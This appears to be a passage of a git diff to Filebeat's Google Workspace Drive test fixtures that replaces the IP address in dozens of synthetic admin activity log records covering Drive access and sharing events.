-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"rename","parameters":[{"name":"billable","boolValue":true},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"bar.gif"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_value","value":"foo.gif","new_value":"bar.gif"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"untrash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"sheets_import_range","parameters":[{"name":"sheets_import_range_recipient_doc","value":"1234"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"trash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"remove_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"upload","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"view","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"shared_drive_id","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_acl_editors","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_document_access_scope","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_document_visibility","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"shared_drive_membership_change","parameters":[{"name":"added_role","value":"editor"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"removed_role","value":"content_manager"},{"name":"membership_change_type","value":"add_to_shared_drive"},{"name":"target","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"shared_drive_settings_change","parameters":[{"name":"new_settings_state","value":"restricted"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_settings_state","value":"unrestricted"},{"name":"shared_drive_settings_change_type","value":"direct_acl"},{"name":"target","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"sheets_import_range_access_change","parameters":[{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"sheets_import_range_recipient_doc","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_user_access","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"can_comment"},{"name":"old_value","value":"can_view"},{"name":"old_visibility","value":"people_with_link"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"target_user","value":"user@example.com"},{"name":"visibility","value":"private"},{"name":"visibility_change","value":"external"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"add_to_folder","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_canceled","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_comment_added","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_requested","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_reviewer_responded","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"create","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"delete","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"download","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"edit","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"add_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"move","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"preview","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"print","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"remove_from_folder","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"rename","parameters":[{"name":"billable","boolValue":true},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"bar.gif"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_value","value":"foo.gif","new_value":"bar.gif"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"untrash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"sheets_import_range","parameters":[{"name":"sheets_import_range_recipient_doc","value":"1234"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"trash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"remove_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"upload","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"view","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"shared_drive_id","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_acl_editors","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_document_access_scope","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_document_visibility","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"shared_drive_membership_change","parameters":[{"name":"added_role","value":"editor"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"removed_role","value":"content_manager"},{"name":"membership_change_type","value":"add_to_shared_drive"},{"name":"target","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"shared_drive_settings_change","parameters":[{"name":"new_settings_state","value":"restricted"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_settings_state","value":"unrestricted"},{"name":"shared_drive_settings_change_type","value":"direct_acl"},{"name":"target","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"sheets_import_range_access_change","parameters":[{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"sheets_import_range_recipient_doc","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_user_access","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"can_comment"},{"name":"old_value","value":"can_view"},{"name":"old_visibility","value":"people_with_link"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"target_user","value":"user@example.com"},{"name":"visibility","value":"private"},{"name":"visibility_change","value":"external"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json
index 74b7811f7b54..bb78f8b06ad8 100644
--- a/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/drive/test/drive-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.drive",
         "event.id": "1",
         "event.module": "google_workspace",
